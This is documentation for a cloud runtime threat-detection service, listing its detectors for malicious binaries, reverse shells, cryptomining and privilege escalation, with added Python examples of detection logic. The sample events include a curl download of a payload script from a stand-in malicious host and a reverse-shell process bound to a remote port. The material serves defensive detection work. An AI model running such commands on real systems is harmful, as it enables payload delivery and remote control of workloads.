Cloud Run Threat Detection overview

Cloud Run Threat Detection is a built-in service of Security Command Center that continuously monitors the state of supported Cloud Run resources to detect the most common runtime attacks. If Cloud Run Threat Detection detects an attack, it generates a finding in Security Command Center in near real-time.

Cloud Run Threat Detection runtime detectors monitor Cloud Run resources for suspicious binaries and libraries and use natural language processing (NLP) to detect malicious Bash and Python code.

In addition, control plane detectors are available through Event Threat Detection. These detectors monitor the Cloud Logging stream of your organization or projects to detect potential attacks against the control plane of your Cloud Run resources.

Supported resources

Cloud Run Threat Detection monitors the following resources:

Supported execution environments

The supported execution environments differ for runtime detectors and control plane detectors.

Supported execution environments for runtime detectors

Cloud Run Threat Detection runtime detectors support only Cloud Run resources that run on the second generation execution environment. Consider the following before enabling Cloud Run Threat Detection:

  • When you enable Cloud Run Threat Detection, you can't create a Cloud Run service or service revision that runs on the first generation execution environment. The Cloud Run service must use the second generation execution environment. We recommend that you test your workloads on the second generation execution environment before enabling Cloud Run Threat Detection.

  • To enable runtime threat detection for a service, deploy a revision that sets the execution environment of the service to either the second generation or the default execution environment.

Supported execution environments for control plane detectors

The control plane detectors support both first and second generation execution environments.

How Cloud Run Threat Detection runtime threat detection works

When you enable Cloud Run Threat Detection, it collects telemetry from the supported Cloud Run resources to analyze processes, scripts, and libraries that might indicate a runtime attack. The following is the execution path when events are detected:

  1. Cloud Run Threat Detection uses a watcher process to collect container and event information for the complete duration of a Cloud Run workload. It can take up to 20 seconds for the watcher process to start.
  2. Cloud Run Threat Detection analyzes the collected event information to determine whether an event is indicative of an incident. It uses NLP to analyze Bash and Python scripts for malicious code.

    • If Cloud Run Threat Detection identifies an incident, it reports the incident as a finding in Security Command Center.

    • If Cloud Run Threat Detection doesn't identify an incident, no information is stored.

    • All data collected is ephemeral and isn't persistently stored.

For information about how to review Cloud Run Threat Detection findings in the Google Cloud console, see Review findings.

Known issues

  • Instances of your Cloud Run services or jobs that live longer than seven days stop sending telemetry information.
  • If the watcher process prematurely stops in a running instance of your Cloud Run service or job, the watcher process doesn't restart. The instance stops sending telemetry information to Cloud Run Threat Detection. Cloud Run Threat Detection logs are absent from the instance logs. There is no indicator that a watcher process has stopped.

Detectors

This section lists the runtime and control plane detectors that are available. We regularly add new detectors as new cloud threats emerge.

Runtime detectors

Cloud Run Threat Detection includes the following runtime detectors:

Each detector is listed by its display name with its API name in parentheses, followed by a description.
Execution: Added Malicious Binary Executed (API name: CLOUD_RUN_ADDED_MALICIOUS_BINARY_EXECUTED)

A binary that meets the following conditions was executed:

  • Identified as malicious based on threat intelligence
  • Not part of the original container image

If an added malicious binary is executed, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Execution: Added Malicious Library Loaded (API name: CLOUD_RUN_ADDED_MALICIOUS_LIBRARY_LOADED)

A library that meets the following conditions was loaded:

  • Identified as malicious based on threat intelligence
  • Not part of the original container image

If an added malicious library is loaded, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Execution: Built in Malicious Binary Executed (API name: CLOUD_RUN_BUILT_IN_MALICIOUS_BINARY_EXECUTED)

A binary that meets the following conditions was executed:

  • Identified as malicious based on threat intelligence
  • Included in the original container image

If a built-in malicious binary is executed, it's a sign that the attacker is deploying malicious containers. They may have gained control of a legitimate image repository or container build pipeline and injected a malicious binary into the container image.

Execution: Container Escape (API name: CLOUD_RUN_CONTAINER_ESCAPE)

A process was executed within the container that attempted to break out of the container's isolation, using known escape techniques or binaries. This type of attack can give the attacker access to the host system. These processes are identified as potential threats based on intelligence data.

If a container escape attempt is detected, it might indicate that an attacker is exploiting vulnerabilities to break out of the container. As a result, the attacker might gain unauthorized access to the host system or broader infrastructure, compromising the entire environment.

Execution: Kubernetes Attack Tool Execution (API name: CLOUD_RUN_KUBERNETES_ATTACK_TOOL_EXECUTION)

A Kubernetes-specific attack tool was executed within the environment, which can indicate that an attacker is targeting Kubernetes cluster components. These attack tools are identified as potential threats based on intelligence data.

If an attack tool is executed within the Kubernetes environment, it can suggest that an attacker has gained access to the cluster and is using the tool to exploit Kubernetes-specific vulnerabilities or configurations.

Execution: Local Reconnaissance Tool Execution (API name: CLOUD_RUN_LOCAL_RECONNAISSANCE_TOOL_EXECUTION)

A local reconnaissance tool not typically associated with the container or environment was executed, suggesting an attempt to gather internal system information. These reconnaissance tools are identified as potential threats based on intelligence data.

If a reconnaissance tool is executed, it suggests that the attacker may be trying to map out the infrastructure, identify vulnerabilities, or collect data on system configurations to plan their next steps.

Execution: Malicious Python executed (Preview) (API name: CLOUD_RUN_MALICIOUS_PYTHON_EXECUTED)

A machine learning model identified the specified Python code as malicious. Attackers can use Python to transfer tools or other files from an external system into a compromised environment and execute commands without binaries.

The detector uses NLP techniques to evaluate the content of executed Python code. Because this approach is not based on signatures, detectors can identify known and novel malicious Python code.

Execution: Modified Malicious Binary Executed (API name: CLOUD_RUN_MODIFIED_MALICIOUS_BINARY_EXECUTED)

A binary that meets the following conditions was executed:

  • Identified as malicious based on threat intelligence
  • Included in the original container image
  • Modified from the original container image during the runtime

If a modified malicious binary is executed, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Execution: Modified Malicious Library Loaded (API name: CLOUD_RUN_MODIFIED_MALICIOUS_LIBRARY_LOADED)

A library that meets the following conditions was loaded:

  • Identified as malicious based on threat intelligence
  • Included in the original container image
  • Modified from the original container image during the runtime

If a modified malicious library is loaded, it's a strong sign that an attacker has control of the workload and they are executing malicious software.
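The added, built-in and modified conditions above decide which of the five malicious binary/library findings is raised. The following is an added example, not Google's code, showing one way to implement that classification over a constructed image manifest and a constructed threat-intelligence set; matching files by SHA-256 digest is an assumption, since the page does not say how threat intelligence identifies a file.

```python
import hashlib
from typing import Dict, Optional

def digest(data: bytes) -> str:
    # File identity is a SHA-256 of contents; hashing is an assumed stand-in for
    # however the real detectors match a file against threat intelligence.
    return hashlib.sha256(data).hexdigest()

# Constructed image manifest: path -> digest of the file as shipped in the image.
IMAGE_MANIFEST = {
    "/usr/bin/app": digest(b"legitimate application v1"),
    "/usr/lib/libhelper.so": digest(b"legitimate helper library"),
    "/usr/bin/miner": digest(b"constructed miner payload shipped in image"),
}
# Constructed threat-intelligence set of known-malicious file digests.
MALICIOUS_DIGESTS = {
    digest(b"constructed miner payload shipped in image"),
    digest(b"constructed backdoor dropped at runtime"),
    digest(b"constructed helper library patched with hook"),
}
# The five findings this page lists; note there is no built-in library finding.
FINDINGS = {
    ("ADDED", "binary"): "CLOUD_RUN_ADDED_MALICIOUS_BINARY_EXECUTED",
    ("ADDED", "library"): "CLOUD_RUN_ADDED_MALICIOUS_LIBRARY_LOADED",
    ("BUILT_IN", "binary"): "CLOUD_RUN_BUILT_IN_MALICIOUS_BINARY_EXECUTED",
    ("MODIFIED", "binary"): "CLOUD_RUN_MODIFIED_MALICIOUS_BINARY_EXECUTED",
    ("MODIFIED", "library"): "CLOUD_RUN_MODIFIED_MALICIOUS_LIBRARY_LOADED",
}

def origin(path: str, observed_digest: str, manifest: Dict[str, str]) -> str:
    # Compare what ran against what the image shipped at that path.
    baseline = manifest.get(path)
    if baseline is None:
        return "ADDED"          # not part of the original image
    if baseline == observed_digest:
        return "BUILT_IN"       # shipped in the image, unchanged
    return "MODIFIED"           # shipped in the image, changed at runtime

def classify(path: str, content: bytes, kind: str,
             manifest: Dict[str, str] = IMAGE_MANIFEST) -> Optional[str]:
    # kind is "binary" (executed) or "library" (loaded). Returns the finding
    # API name, or None when the file is not known-malicious.
    d = digest(content)
    if d not in MALICIOUS_DIGESTS:
        return None
    return FINDINGS.get((origin(path, d, manifest), kind))
```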

Malicious Script Executed (API name: CLOUD_RUN_MALICIOUS_SCRIPT_EXECUTED)

A machine learning model identified the specified Bash code as malicious. Attackers can use Bash to transfer tools or other files from an external system into a compromised environment and execute commands without binaries.

The detector uses NLP techniques to evaluate the content of executed Bash code. Because this approach is not based on signatures, detectors can identify known and novel malicious Bash code.

Malicious URL Observed (API name: CLOUD_RUN_MALICIOUS_URL_OBSERVED)

Cloud Run Threat Detection observed a malicious URL in the argument list of a running process.

The detector checks URLs that are observed in the argument list of running processes against the lists of unsafe web resources that are maintained by the Google Safe Browsing service. If a URL is incorrectly classified as a phishing site or malware, report it at Reporting Incorrect Data.

Reverse Shell (API name: CLOUD_RUN_REVERSE_SHELL)

A process started with stream redirection to a remote connected socket. The detector looks for stdin bound to a remote socket.

With a reverse shell, an attacker can communicate from a compromised workload to an attacker-controlled machine. The attacker can then command and control the workload—for example, as part of a botnet.

Unexpected Child Shell (API name: CLOUD_RUN_UNEXPECTED_CHILD_SHELL)

A process that does not normally invoke shells spawned a shell process.

The detector monitors all process executions. When a shell is invoked, the detector generates a finding if the parent process is known to not typically invoke shells.
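As an added example that is not part of the Cloud Run Threat Detection implementation, the following Python runs simplified versions of the Malicious URL Observed, Reverse Shell and Unexpected Child Shell checks described above over constructed process events. The shell-spawning parent allow-list and the unsafe URL set are assumptions standing in for the real process baseline and the Safe Browsing lists.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional, Tuple

SHELLS = {"sh", "bash", "dash", "zsh"}
# Assumed baseline of parents that routinely spawn shells (constructed set).
SHELL_SPAWNING_PARENTS = {"sh", "bash", "dash", "zsh", "supervisord", "cron"}
# Constructed stand-in for the Safe Browsing unsafe-resource lists.
UNSAFE_URLS = {"http://malware.example/payload.sh"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

@dataclass(frozen=True)
class ProcEvent:  # one process-execution event (constructed shape)
    pid: int
    comm: str                     # path of the executed program
    argv: Tuple[str, ...]
    parent_comm: str              # name of the parent process
    stdin_peer: Optional[Tuple[str, int]] = None  # (ip, port) if fd 0 is a connected socket

def unexpected_child_shell(ev: ProcEvent) -> Optional[str]:
    # A shell whose parent is not known to invoke shells.
    if ev.comm.rsplit("/", 1)[-1] in SHELLS and ev.parent_comm not in SHELL_SPAWNING_PARENTS:
        return "CLOUD_RUN_UNEXPECTED_CHILD_SHELL"
    return None

def reverse_shell(ev: ProcEvent) -> Optional[str]:
    # stdin bound to a socket whose peer is remote (loopback does not count).
    if ev.stdin_peer and not ipaddress.ip_address(ev.stdin_peer[0]).is_loopback:
        return "CLOUD_RUN_REVERSE_SHELL"
    return None

def malicious_url(ev: ProcEvent) -> Optional[str]:
    # Any URL in the argument list that is on the unsafe-resource list.
    if any(u in UNSAFE_URLS for arg in ev.argv for u in URL_RE.findall(arg)):
        return "CLOUD_RUN_MALICIOUS_URL_OBSERVED"
    return None

def evaluate(events):
    # Run every detector over every event; returns (pid, finding API name) pairs.
    return [(ev.pid, name) for ev in events
            for name in (d(ev) for d in (unexpected_child_shell, reverse_shell, malicious_url)) if name]

# Constructed sample telemetry, not real Cloud Run events.
SAMPLE_EVENTS = [
    ProcEvent(101, "/bin/bash", ("bash", "-c", "id"), parent_comm="node"),
    ProcEvent(102, "/bin/sh", ("sh", "-i"), parent_comm="bash", stdin_peer=("203.0.113.7", 4444)),
    ProcEvent(103, "/usr/bin/curl", ("curl", "http://malware.example/payload.sh"), parent_comm="sh"),
    ProcEvent(104, "/bin/bash", ("bash",), parent_comm="python3", stdin_peer=("127.0.0.1", 8080)),
]
```

Event 104 shows the loopback edge case: the child-shell check fires, but stdin bound to a local socket is not reported as a reverse shell.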

Control plane detectors

The following control plane detectors are available through Event Threat Detection. These detectors are enabled by default. You manage these detectors the same way you do other Event Threat Detection detectors. For more information, see Use Event Threat Detection.

Each detector is listed by its display name with its API name in parentheses, followed by its log source types and a description.

Impact: Cryptomining Commands (Preview) (API name: CLOUD_RUN_JOBS_CRYPTOMINING_COMMANDS)

Log source types: Cloud Audit Logs: IAM System Event audit logs

Identifies when specific cryptomining commands are attached to a Cloud Run job during execution.

Execution: Cryptomining Docker Image (Preview) (API name: CLOUD_RUN_CRYPTOMINING_DOCKER_IMAGES)

Log source types: Cloud Audit Logs: IAM System Event audit logs

Identifies when specific known-bad Docker images are attached to a new or existing Cloud Run service or job.

Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy (Preview) (API name: CLOUD_RUN_SERVICES_SET_IAM_POLICY)

Log source types: Cloud Audit Logs: Admin Activity logs

Detects when the default Compute Engine service account is used to set the IAM policy for a Cloud Run service. This is a potential post-exploitation action when a Compute Engine token is compromised from a serverless service.

For deprecated and shut down rules, see Deprecations.

What's next